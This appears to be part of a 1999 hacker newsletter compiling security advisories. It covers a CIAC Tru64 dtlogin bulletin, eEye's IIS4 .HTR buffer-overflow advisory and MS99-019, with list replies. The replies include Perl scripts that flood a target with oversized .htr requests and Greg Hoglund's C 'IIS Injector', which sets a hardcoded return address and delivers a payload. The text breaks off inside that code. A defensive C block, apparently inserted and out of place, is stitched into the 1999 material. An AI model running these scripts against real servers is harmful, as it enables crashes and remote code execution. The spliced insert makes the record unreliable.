    exit(1);
}

@HWA

110.0 CIAC Bulletin J-044: Tru64/Digital UNIX (dtlogin) Security Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 11 Jun 1999 11:11:10 -0700 (PDT)
From: CIAC Mail User
To: ciac-bulletin@rumpole.llnl.gov
Subject: CIAC Bulletin J-044: Tru64/Digital UNIX (dtlogin) Security Vulnerability

[ For Public Release ]

-----BEGIN PGP SIGNED MESSAGE-----

__________________________________________________________
The U.S.
Department of Energy
Computer Incident Advisory Capability
__________________________________________________________

INFORMATION BULLETIN

Tru64/Digital UNIX (dtlogin) Security Vulnerability

June 10, 1999 21:00 GMT                                        Number J-044
______________________________________________________________________________
PROBLEM:       There is a potential vulnerability with the /usr/dt/bin/dtlogin
               in Compaq's Tru64/DIGITAL UNIX software, where under certain
               circumstances, a user may gain unauthorized access as superuser.
PLATFORM:      Systems running Tru64/DIGITAL UNIX V4.0B, V4.0D, V4.0E and V4.0F.
DAMAGE:        Under certain circumstances, a user may gain unauthorized access
               as superuser.
SOLUTION:      Apply the vendor-supplied patch.
______________________________________________________________________________
VULNERABILITY  The risk is high due to the possibility of gaining a root
ASSESSMENT:    compromise.
______________________________________________________________________________

[ Start Compaq Computer Corporation Advisory ]

________________________________________________________
UPDATE: May 11, 1999
TITLE:  Tru64/DIGITAL UNIX V4.0b, V4.0d, V4.0e and V4.0f Potential Security Vulnerability
ref#:   SSRT0600U "dtlogin"
SOURCE: Compaq Computer Corporation Software Security Response Team

"Compaq is broadly distributing this Security Advisory in order to bring to the attention of users of Compaq products the important security information contained in this Advisory. Compaq recommends that all users determine the applicability of this information to their individual situations and take appropriate action. Compaq does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, Compaq will not be responsible for any damages resulting from user's use or disregard of the information provided in this Advisory."
-----------------------------------------------------------------------
IMPACT:

Compaq has discovered a potential vulnerability with the /usr/dt/bin/dtlogin in Compaq's Tru64/DIGITAL UNIX software, where under certain circumstances, a user may gain unauthorized access as superuser.
-----------------------------------------------------------------------
RESOLUTION:

This potential security problem has been resolved and a patch for this problem has been made available for Tru64/DIGITAL UNIX V4.0B, V4.0D, V4.0E and V4.0F. Systems with enhanced security enabled and one or more of the products listed below, should install this patch immediately.

- Distributed Computing Environment (DCE) from Compaq
- Advanced Server for Digital UNIX (ASDU) from Compaq
- AFS Enterprise File Systems from Transarc
- Kerberos 4 Network Authentication Protocol from MIT

If you need this patch for V4.0, V4.0A or V4.0C, please contact your normal Compaq Services support channel.

*This solution will be included in a future distributed release of Compaq's Tru64/DIGITAL UNIX.

This patch may be obtained from the World Wide Web at the following FTP address: http://www.service.digital.com/patches

Use the FTP access option, select DIGITAL_UNIX directory, then choose the appropriate version directory and download the patch accordingly.

Note:
[1]  The appropriate patch kit must be installed following any upgrade to V4.0b, V4.0d, V4.0e or V4.0f.
[1a] These patches may be used on any patch kit/base level.
[2]  IMPORTANT - Please review all README and release notes which are related to this patch or an official patch kit, prior to installation of this patch.

Additional Considerations:

This patch updates the following component: /usr/dt/bin/dtlogin

If you believe you have, or aren't sure if you have, previously installed a patch to this module you should contact your normal Compaq Service channel. Also, if you need further information, please contact your normal Compaq Services support channel.

Compaq appreciates your cooperation and patience. We regret any inconvenience applying this information may cause.

As always, Compaq urges you to periodically review your system management and security procedures. Compaq will continue to review and enhance the security features of its products and work with customers to maintain and improve the security and integrity of their systems.
________________________________________________________
Copyright (c) Compaq Computer Corporation, 1999 All Rights Reserved.
Unpublished Rights Reserved under the Copyright Laws Of The United States.
________________________________________________________

[ End Compaq Computer Corporation Advisory ]
______________________________________________________________________________

CIAC wishes to acknowledge the Compaq Computer Corporation for the information contained in this bulletin.
______________________________________________________________________________

For additional information or assistance, please contact CIAC:

CIAC, the Computer Incident Advisory Capability, is the computer security incident response team for the U.S. Department of Energy (DOE) and the emergency backup response team for the National Institutes of Health (NIH). CIAC is located at the Lawrence Livermore National Laboratory in Livermore, California. CIAC is also a founding member of FIRST, the Forum of Incident Response and Security Teams, a global organization established to foster cooperation and coordination among computer security teams worldwide.

CIAC services are available to DOE, DOE contractors, and the NIH. CIAC can be contacted at:

    Voice:    +1 925-422-8193
    FAX:      +1 925-423-8002
    STU-III:  +1 925-423-2604
    E-mail:   ciac@llnl.gov

For emergencies and off-hour assistance, DOE, DOE contractor sites, and the NIH may contact CIAC 24-hours a day. During off hours (5PM - 8AM PST), use one of the following methods to contact CIAC:

1. Call the CIAC voice number 925-422-8193 and leave a message, or
2. Call 888-449-8369 to send a Sky Page to the CIAC duty person or
3. Send e-mail to 4498369@skytel.com, or
4. Call 800-201-9288 for the CIAC Project Leader.

Previous CIAC notices, anti-virus software, and other information are available from the CIAC Computer Security Archive.

    World Wide Web:  http://www.ciac.org/ (or http://ciac.llnl.gov)
    Anonymous FTP:   ftp.ciac.org (or ciac.llnl.gov)
    Modem access:    +1 (925) 423-4753 (28.8K baud)
                     +1 (925) 423-3331 (28.8K baud)

CIAC has several self-subscribing mailing lists for electronic publications:

1. CIAC-BULLETIN for Advisories, highest priority - time critical information and Bulletins, important computer security information;
2. SPI-ANNOUNCE for official news about Security Profile Inspector (SPI) software updates, new features, distribution and availability;
3. SPI-NOTES, for discussion of problems and solutions regarding the use of SPI products.

Our mailing lists are managed by a public domain software package called Majordomo, which ignores E-mail header subject lines. To subscribe (add yourself) to one of our mailing lists, send the following request as the E-mail message body, substituting ciac-bulletin, spi-announce OR spi-notes for list-name:

E-mail to ciac-listproc@llnl.gov or majordomo@rumpole.llnl.gov:
    subscribe list-name
e.g., subscribe ciac-bulletin

You will receive an acknowledgment email immediately with a confirmation that you will need to mail back to the addresses above, as per the instructions in the email. This is a partial protection to make sure you are really the one who asked to be signed up for the list in question.

If you include the word 'help' in the body of an email to the above address, it will also send back an information file on how to subscribe/unsubscribe, get past issues of CIAC bulletins via email, etc.

PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing communities receive CIAC bulletins. If you are not part of these communities, please contact your agency's response team to report incidents. Your agency's team will coordinate with CIAC. The Forum of Incident Response and Security Teams (FIRST) is a world-wide organization. A list of FIRST member organizations and their constituencies can be obtained via WWW at http://www.first.org/.

This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes.

LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)

J-034: Cisco 7xx TCP and HTTP Vulnerabilities
J-035: Linux Blind TCP Spoofing
J-036: LDAP Buffer overflow against Microsoft Directory Services
J-037: W97M.Melissa Word Macro Virus
J-038: HP-UX Vulnerabilities (hpterm, ftp)
J-039: HP-UX Vulnerabilities (MC/ServiceGuard & MC/LockManager, DES
J-040: HP-UX Security Vulnerability in sendmail
J-041: Cisco IOS(R) Software Input Access List Leakage with NAT
J-042: Web Security
J-043: (bulletin in process)

-----BEGIN PGP SIGNATURE-----
Version: 4.0 Business Edition

iQCVAwUBN2E1nLnzJzdsy3QZAQGZWAP+LLkyHUQVu8iWeoAh8XMUNy+vEl0ysRFI
iuSI9J+O/gTFwLMPugKeYOvFrLUs1/EPM4YH8zduPQHyMk/+0s2Jz3icj13d3Oc5
9SRB1vAYtridVzjAU1XwXUj8xzzdyx//8qSygt69tfJm1kEweR70AAXwUhGY2pus
kZ2eTla3ldU=
=h3+v
-----END PGP SIGNATURE-----

@HWA

111.0 The IIS4 eEye security advisory and threads as mentioned previously
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Retina vs. IIS4, Round 2, KO
eEye - Digital Security Team (eeye@EEYE.COM)
Tue, 15 Jun 1999 12:18:16 -0000

Retina vs. IIS4, Round 2

Systems Affected:
    Internet Information Server 4.0 (IIS4)
    Microsoft Windows NT 4.0 SP3 Option Pack 4
    Microsoft Windows NT 4.0 SP4 Option Pack 4
    Microsoft Windows NT 4.0 SP5 Option Pack 4

Release Date:  June 8, 1999
Advisory Code: AD06081999

Description:

We have been debating how to start out this advisory. How do you explain that 90% or so of the Windows NT web servers on the Internet are open to a hole that lets an attacker execute arbitrary code on the remote web server? So the story starts...

The Goal:

Find a buffer overflow that will affect 90% of the Windows NT web servers on the Internet. Exploit this buffer overflow.

The Theory:

There will be overflows in at least one of the default IIS filtered extensions (i.e. .ASP, .IDC, .HTR). The way we think the exploit will take place is that IIS will pass the full URL to the DLL that handles the extension.
Therefore if the ISAPI DLL does not do proper bounds checking it will overflow a buffer taking IIS (inetinfo.exe) with it and allow us to execute arbitrary code on the remote server.

Entrance Retina:
At the same time of working on this advisory we have been working on the AI mining logic for Retina's HTTP module. What better test scenario than this? We gave Retina a list of 10 or so extensions common to IIS and instructed it to find any possible holes relating to these extensions.

The Grind:
After about an hour Retina found what appeared to be a hole. It displayed that after sending "GET /[overflow].htr HTTP/1.0" it had crashed the server. We all crossed our fingers, started up the good ol' debugger and had Retina hit the server again.

Note: [overflow] is 3k or so characters... but we will not get into the string lengths and such here. View the debug info and have a look for yourself.

The Registers:
EAX = 00F7FCC8
EBX = 00F41130
ECX = 41414141
EDX = 77F9485A
ESI = 00F7FCC0
EDI = 00F7FCC0
EIP = 41414141
ESP = 00F4106C
EBP = 00F4108C
EFL = 00000246

Note: Retina was using "A" (0x41 in hex) for the character to overflow with. If you're not familiar with buffer overflows a quick note would be that getting our bytes into any of the registers is a good sign, and directly into EIP makes it even easier :)

Explain This:
The overflow is in relation to the .HTR extensions. IIS includes the capability to allow Windows NT users to change their password via the web directory /iisadmpwd/. This feature is implemented as a set of .HTR files and the ISAPI extension file ISM.DLL. So somewhere along the line when the URL is passed through to ISM.DLL, proper bounds checking is not done and our overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed by default on IIS4 servers. Looks like we got our 90% of the Windows NT web servers part down. However, can we exploit this?

The Exploit:
Yes. We can definitely exploit this and we have.
We will not go into much detail here about how the buffer is exploited and such. Read the comments in the asm file for more information. However, one nice thing to note is that the exploit has been crafted in such a way to work on SP4 and SP5 machines, therefore there is no guessing of offsets and possible accidental crashing of the remote server. We have not tested the exploit on SP3 and would love to know if it works or not. eMail alert@eEye.com if you've successfully exploited this hole on SP3. For more details about the exploit visit the eEye web site at www.eEye.com

The Fallout:
Almost 90% of the Windows NT web servers on the Internet are affected by this hole. Everyone from NASDAQ to the U.S. Army to Microsoft themselves. No, we did not try it on the above mentioned. But it is easy to verify if a web server is exploitable without using the exploit. Even a server that's locked in a guarded room behind a Cisco Pix can be broken into with this hole. This is a reminder to all software vendors that testing for common security holes in your software is a must. Demand more from your software vendors.

The Request. (Well one anyway.)
Dear Microsoft,
One of the things that we found out is that IIS did not log any trace of our attempted hack. We recommend that you pass all server requests to the logging service before passing it to any ISAPI filters etc... The logging service should be, as named, an actual service running in a separate memory space so that when inetinfo goes down intrusion signatures are still logged.

Retina vs. IIS4, Round 2. KO.

Fixes:
1. Remove the extension .HTR from the ISAPI DLL list. Microsoft has just updated their checklist to include this interim fix.
   http://microsoft.com/security/products/iis/CheckList.asp
2. Apply the patch supplied by Microsoft when available.
   http://microsoft.com/security

Vendor Status:
We contacted Microsoft on June 8th 1999, eEye Digital Security Team provided all information needed to reproduce the exploit and how to fix it. Microsoft security team did confirm the exploit and are releasing a patch for IIS.

Related Links
Advisory - On our web site
http://www.eEye.com/database/advisories/ad06081999/ad06081999.html
Advisory - Retina Brain File used to uncover the hole
http://www.eEye.com/database/advisories/ad06081999/ad06081999-brain.html
Retina - The Network Security Scanner
http://www.eEye.com/retina/

Greetings go out to:
The former Secure Networks Inc., L0pht, Phrack, ADM, Rhino9, Attrition, HNN and any other security company or organization that believes in full disclosure.

Copyright (c) 1999 eEye Digital Security Team
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission.

Disclaimer:
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
www.eEye.com

--------------------------------------------------------------------------------

Date: Tue, 15 Jun 1999 18:23:28 -0000
From: eEye - Digital Security Team
Subject: Update to IIS Remote Hole.
We have updated our advisory on our website,
http://www.eeye.com/database/advisories/ad06081999/ad06081999.html
and as promised added a link to the working remote exploit,
http://www.eeye.com/database/advisories/ad06081999/ad06081999-exploit.html

Signed,
eEye Digital Security Team
http://www.eEye.com

--------------------------------------------------------------------------------

Re: Retina vs. IIS4, Round 2, KO
Ryan R Permeh (rrpermeh@RCONNECT.COM)
Tue, 15 Jun 1999 17:01:23 -0500

tested, this works for me... scripting was turned on... perl exploit code follows:

#!/usr/bin/perl
#props to the absu crew
use Net::Telnet;
for ($i=2500;$i<3500;$i++)
{
    $obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80);
    my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n";
    print "$cmd\n";$obj->print("$cmd");
    $obj->close;
}

--
----------------------------------------------------------------
Ryan R Permeh          E-MAIL: rrpermeh@rconnect.com
IS Engineer            WEB   : http://www.rconnect.com
Rural Connections      HELP  : help@rconnect.com
                       FAQ   : http://www.rconnect.com/help
                       SALES : sales@rconnect.com
----------------------------------------------------------------
120 First Street NE    PHONE : (507) 281-5005
Rochester, MN 55906    FAX   : (507) 281-9272

--------------------------------------------------------------------------------

Re: Retina vs. IIS4, Round 2, KO
Randal L. Schwartz (merlyn@STONEHENGE.COM)
Tue, 15 Jun 1999 16:59:08 -0700

>>>>> "Ryan" == Ryan R Permeh writes:

Ryan> #!/usr/bin/perl
Ryan> #props to the absu crew
Ryan> use Net::Telnet;
Ryan> for ($i=2500;$i<3500;$i++)
Ryan> {
Ryan> $obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80);
Ryan> my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n";
Ryan> print "$cmd\n";$obj->print("$cmd");
Ryan> $obj->close;
Ryan> }

It's silly to use Net::Telnet for HTTP:

use LWP::Simple;
for ($i = 2500; $i <= 3500; $i++) {
    warn "$i\n";
    get "http://$ARGV[0]/".('a' x $i).".htr";
}

--
Name: Randal L. Schwartz / Stonehenge Consulting Services (503)777-0095
Keywords: Perl training, UNIX[tm] consulting, video production, skiing, flying
Email: Snail: (Call) PGP-Key: (finger merlyn@teleport.com)
Web: My Home Page!
Quote: "I'm telling you, if I could have five lines in my .sig, I would!" -- me

--------------------------------------------------------------------------------

http://www.microsoft.com/security/bulletins/ms99-019.asp

Microsoft Security Bulletin (MS99-019)
Patch Available for Malformed HTR Request Vulnerability
Originally Posted: May 27, 1999

Summary
=======
Microsoft has released a patch that eliminates a vulnerability in Microsoft (r) Internet Information Server 4.0. The vulnerability could allow denial of service attacks against an IIS server or, under certain conditions, could allow arbitrary code to be run on the server.

Microsoft has issued this bulletin to advise customers of steps they can take to protect themselves against this vulnerability. A patch to eliminate this vulnerability is being developed, and an update to this bulletin will be released to advise customers when it is available.

Issue
=====
IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. A vulnerability exists in ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.

The vulnerability involves an unchecked buffer in ISM.DLL. This poses two threats to safe operation. The first is a denial of service threat. A malformed request for an .HTR file could overflow the buffer, causing IIS to crash. The server would not need to be rebooted, but IIS would need to be restarted. The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally.
This vulnerability does not involve the functionality of the password administration features of .HTR files. While there are no reports of customers being adversely affected by this vulnerability, Microsoft is proactively releasing this bulletin to allow customers to take appropriate action to protect themselves against it.

Affected Software Versions
==========================
- Microsoft Internet Information Server 4.0

What Microsoft is Doing
=======================
Microsoft has provided a workaround that fixes the problem identified. The workaround is discussed below in What Customers Should Do.

Microsoft also has sent this security bulletin to customers subscribing to the Microsoft Product Security Notification Service. See http://www.microsoft.com/security/services/bulletin.asp for more information about this free customer service.

What Customers Should Do
========================
Microsoft highly recommends that customers disable the script mapping for .HTR files as follows:
- From the desktop, start the Internet Service Manager by clicking Start | Programs | Windows NT 4.0 Option Pack | Microsoft Internet Information Server | Internet Service Manager
- Double-click "Internet Information Server"
- Right-click on the computer name and select Properties
- In the Master Properties drop-down box, select "WWW Service", then click the "Edit" button.
- Click the "Home Directory" tab, then click the "Configuration" button.
- Highlight the line in the extension mappings that contains ".HTR", then click the "Remove" button.
- Respond "yes" to "Remove selected script mapping?", click OK 3 times, close ISM

A patch will be available shortly to eliminate the vulnerability altogether. Customers should monitor http://www.microsoft.com/security for an announcement when the patches are available.
Microsoft recommends that customers review the IIS Security Checklist at http://www.microsoft.com/security/products/iis/CheckList.asp

More Information
================
Please see the following references for more information related to this issue.
- Microsoft Security Bulletin MS99-019, Workaround Available for "Malformed HTR Request" Vulnerability (The Web-posted version of this bulletin), http://www.microsoft.com/security/bulletins/ms99-019.asp.
- IIS Security Checklist, http://www.microsoft.com/security/products/iis/CheckList.asp

Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp.

Revisions
=========
- June 15, 1999: Bulletin Created.

For additional security-related information about Microsoft products, please visit http://www.microsoft.com/security

-------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.

(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
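The two defensive pieces the advisory and the bulletin above describe, side by side: the unchecked-copy pattern that ISM.DLL's handler fell into, a handler that validates the .HTR path before any copy, and the script-map gate that the workaround creates once the .HTR entry is gone. This is an added example, not eEye's, Microsoft's or IIS's code; HTR_PATH_MAX, the function names and the script-map table are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Longest .HTR path the handler will accept. Assumed value: the password
 * pages under /iisadmpwd/ have short names, so a request of ~3000 bytes,
 * the size the advisories mention, is rejected long before any copy. */
#define HTR_PATH_MAX 260

enum verdict { HTR_OK = 0, HTR_NOT_HTR, HTR_TOO_LONG, HTR_BAD_CHARS };

/* The defect pattern the advisories describe: a fixed-size buffer filled by
 * a copy whose length the client controls. Kept only for contrast, and never
 * called by anything in this file. */
void copy_unchecked(const char *url)
{
    char buf[1024];
    strcpy(buf, url);       /* writes past buf once strlen(url) >= 1024 */
}

/* Script map table as it looks after the workaround: no .htr entry, so a
 * request for an .htr file is served as plain content instead of reaching
 * ISM.DLL. Constructed list; extensions only. */
static const char *const script_maps[] = {
    ".asp", ".asa", ".idc", ".ida", ".idq", ".htw", ".shtm", ".shtml", ".stm"
};

/* Copy the lower-cased extension of the last path segment into out (an empty
 * string if there is none), ignoring any query string, so "/d/x.HTR?a=b"
 * gives ".htr" and "/d.ir/x" gives "". Returns the extension length. */
size_t path_extension(const char *path, char *out, size_t outsz)
{
    size_t n = strcspn(path, "?"), start = n, len = 0, i;
    for (i = 0; i < n; i++) {
        if (path[i] == '/') start = n;       /* new segment: forget the dot */
        else if (path[i] == '.') start = i;
    }
    while (start + len < n && len + 1 < outsz) {
        out[len] = (char)tolower((unsigned char)path[start + len]);
        len++;
    }
    out[len] = '\0';
    return len;
}

/* 1 if the request's extension is still mapped to a script DLL, else 0. */
int extension_is_mapped(const char *path)
{
    char ext[16];
    size_t i;
    path_extension(path, ext, sizeof ext);
    for (i = 0; i < sizeof script_maps / sizeof script_maps[0]; i++)
        if (strcmp(ext, script_maps[i]) == 0) return 1;
    return 0;
}

/* Bounded handler for .htr requests: every check runs before the copy, and
 * out is written only when HTR_OK is returned. outsz is the size of out. */
enum verdict handle_htr_path(const char *path, char *out, size_t outsz)
{
    char ext[16];
    size_t len, i;
    path_extension(path, ext, sizeof ext);
    if (strcmp(ext, ".htr") != 0) return HTR_NOT_HTR;
    len = strlen(path);
    if (len > HTR_PATH_MAX || len >= outsz) return HTR_TOO_LONG;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)path[i];
        if (c < 0x20 || c > 0x7e) return HTR_BAD_CHARS;  /* raw bytes, not a path */
    }
    memcpy(out, path, len + 1);
    return HTR_OK;
}

int main(void)
{
    static char junk[3200];   /* constructed: the ~3k request from the advisory */
    char out[HTR_PATH_MAX + 1];
    memset(junk, 'A', 3000);
    junk[0] = '/';
    strcpy(junk + 3000, "BBBB.htr");
    printf(".htr still mapped after workaround: %d\n",
           extension_is_mapped("/iisadmpwd/achg.htr"));
    printf("3k .htr request    -> verdict %d\n", handle_htr_path(junk, out, sizeof out));
    printf("short .htr request -> verdict %d\n",
           handle_htr_path("/iisadmpwd/achg.htr", out, sizeof out));
    return 0;
}
```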
--------------------------------------------------------------------------------

Date: Wed, 16 Jun 1999 12:12:33 -0400
From: Russ
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Update to IIS Remote Hole.

Nelson Bunker has provided us with a VB app which automates the process of updating your IIS 4.0 Metabase to remove the ISM.DLL mappings which permit the eEye IISHack to work. It's a temporary workaround while Microsoft continue to work on a proper fix (which is expected today or tomorrow btw). For those of you with large IIS installations, you might find this extremely useful. If you use it, make sure you drop Nelson a line and thank him for it!

Check the NTBugtraq Home Page, http://ntbugtraq.ntadvice.com, in the "What's New" section for links.

Cheers,
Russ - NTBugtraq Editor

For those of you that have too many IIS machines to yank this off by hand here is some vb code to set your IIS metabase remotely...

VB 5.0 sp3
IIS Resource kit installed -- Metabase editor utility from resource kit needs to be installed.

Have fun! You can set all of your metabase up with the tools mentioned above.
:-)

Nelson Bunker

'The subs I put in Modules handles the App Mappings tab of the
'application configuration screen

Sub AppMappings(ByRef IIS)
    'delete all existing script paths
    Call DeleteAllLowerProperties(IIS, "ScriptMaps")

    'the only thing changed on scripts maps is htm & html mapped to
    'asp.dll and removed the ism.dll mapping
    newscriptmaps = Array( _
        ".asa,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", _
        ".html,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", _
        ".asp,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", _
        ".cdx,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", _
        ".cer,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", _
        ".htm,C:\WINNT\System32\inetsrv\asp.dll,1,PUT,DELETE;", _
        ".htw,C:\WINNT\System32\webhits.dll,3;", _
        ".ida,C:\WINNT\System32\idq.dll,3;", _
        ".idc,C:\WINNT\System32\inetsrv\httpodbc.dll,1;", _
        ".idq,C:\WINNT\System32\idq.dll,3;", _
        ".shtm,C:\WINNT\System32\inetsrv\ssinc.dll,1;", _
        ".shtml,C:\WINNT\System32\inetsrv\ssinc.dll,1;", _
        ".stm,C:\WINNT\System32\inetsrv\ssinc.dll,1")
    IIS.PutEx 2, "ScriptMaps", newscriptmaps
    IIS.SetInfo
End Sub

Sub DeleteAllLowerProperties(ByRef IIS, ByVal PropertyName)
    'delete all existing script paths
    PathList = IIS.GetDataPaths(PropertyName, 1)
    If Err.Number <> 0 Then
        For Each Path In PathList
            Set objScriptPath = GetObject(Path)
            objScriptPath.PutEx 1, PropertyName, True
        Next
    End If
End Sub

' Start form1 here
Function GetServerArray()
    GetServerArray = Array("Websvr1", ...., "WebsvrX")
End Function

Private Sub Form_Load()
    ServerArray = GetServerArray()
    For Each Server In ServerArray
        Set globalW3svc = GetObject("IIS://" & Server & "/W3SVC")
        Call AppMappings(globalW3svc)
    Next
End Sub

--------------------------------------------------------------------------------

Date: Wed, 16 Jun 1999 08:58:05 -0700
From: Greg Hoglund
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: IIS Remote Exploit (injection code)

I read yesterday on eEye.com that they had discovered a buffer overflow in IIS. I could not resist writing an exploit.
I did not have time to design a really cool payload for this exploit, so I simply wrote the injection code. However, this is meaningful for several reasons. Attached is the injection code. The exploit will deliver any payload of your choosing. Your payload will be executed. This empowers you to create a "collection" of payloads that are not dependent upon the injection vector in any way. This decoupling is important for military needs, where a single injection vector needs to work, but the "warhead" may be different depending on the target's characterization.

The exploit was fairly simple to build. In short, I read on eEye.com that they had overflowed IIS with something like a ~3000 character URL. Within minutes I had caused IIS to crash with EIP under my control. I used a special pattern in the buffer (see code) to make it easy for me to identify where EIP was being popped from. The pattern also made it easy to determine where I was jumping around. Use the tekneek Danielson. ;-)

So, I controlled EIP, but I needed to get back to my stack segment, of course. This is old school, and I really lucked out. Pushed down two levels on the stack was an address for my buffer. I couldn't have asked for more. So, I found a location in NTDLL.DLL (0x77F88CF0) that I could return to. It had two pop's followed by a return. This made my injection vector return to the value that was stored two layers down on the stack. Bam, I was in my buffer. So, I landed in a weird place, had to add a near jump to get to somewhere more useful.. nothing special, and here we are with about 2K of payload space.

If you don't supply any mobile code to be run, the injection vector will supply some for you. The default payload is simply a couple of no-ops followed by a debug breakpoint (interrupt 3)... It's easy to play with if you want to build your own payloads.. just keep a debugger attached to inetinfo.exe on the target machine.
Lastly, I would simply like to point out that monoculture installations are very dangerous. It's a concept from agribusiness.. if you have all one crop, and a virus comes along that can kill that crop, you're out of business. With almost ALL of the IIS servers on the net being vulnerable to this exploit, we also have a monoculture. And, it's not just IIS. The backbone of the Internet is built on common router technology (such as cisco IOS). If a serious exploit comes along for the IOS kernel, can you imagine the darkness that will fall?

<--- snip

// IIS Injector for NT
// written by Greg Hoglund
// http://www.rootkit.com
//
// If you would like to deliver a payload, it must be stored in a binary file.
// This injector decouples the payload from the injection code allowing you to
// create a number of different attack payloads. This code could be used, for
// example, by a military that needs to attack IIS servers, and has characterized
// the eligible hosts. The proper attack can be chosen depending on needs. Since
// the payload is so large with this injection vector, many options are available.
// First and foremost, virii can be delivered with ease. The payload is also plenty
// large enough to remotely download and install a back door program.
// Considering the monoculture of NT IIS servers out on the 'Net, this represents a
// very serious security problem.
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    SOCKET s = 0;
    WSADATA wsaData;

    if(argc < 2)
    {
        fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \
                "http://www.rootkit.com\nUsage: %s \n", argv[0]);
        exit(0);
    }

    WSAStartup(MAKEWORD(2,0), &wsaData);

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(INVALID_SOCKET != s)
    {
        SOCKADDR_IN anAddr;
        anAddr.sin_family = AF_INET;
        anAddr.sin_port = htons(80);
        anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

        if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
        {
            static char theSploit[4096];

            // fill pattern
            char kick = 'z'; //0x7a
            char place = 'A';

            // my uber sweet pattern gener@t0r
            for(int i=0;i<4096;i+=4)
            {
                theSploit[i] = kick;
                theSploit[i+1] = place;
                theSploit[i+2] = place + 1;
                theSploit[i+3] = place + 2;

                if(++place == 'Y') // beyond 'XYZ'
                {
                    place = 'A';
                    if(--kick < 'a') kick = 'a';
                }
            }

            _snprintf(theSploit, 5, "get /");
            _snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0");

            // after crash, looks like inetinfo.exe is jumping to the address
            // stored @ location 'GHtG' (0x47744847)
            // cross reference back to the buffer pattern, looks like we need
            // to store our EIP into theSploit[598]

            // magic eip into NTDLL.DLL
            theSploit[598] = (char)0xF0;
            theSploit[599] = (char)0x8C;
            theSploit[600] = (char)0xF8;
            theSploit[601] = (char)0x77;

            // code I want to execute
            // will jump forward over the
            // embedded eip, taking us
            // directly to the payload
            theSploit[594] = (char)0x90; //nop
            theSploit[595] = (char)0xEB; //jmp
            theSploit[596] = (char)0x35; //
            theSploit[597] = (char)0x90; //nop

            // the payload. This code is executed remotely.
            // if no payload is supplied on stdin, then this default
            // payload is used. int 3 is the debug interrupt and
            // will cause your debugger to "breakpoint" gracefully.
            // upon examination you will find that you are sitting
            // directly in this code-payload.
            if(argc < 3)
            {
                theSploit[650] = (char) 0x90; //nop
                theSploit[651] = (char) 0x90; //nop
                theSploit[652] = (char) 0x90; //nop
                theSploit[653] = (char) 0x90; //nop
                theSploit[654] = (char) 0xCC; //int 3
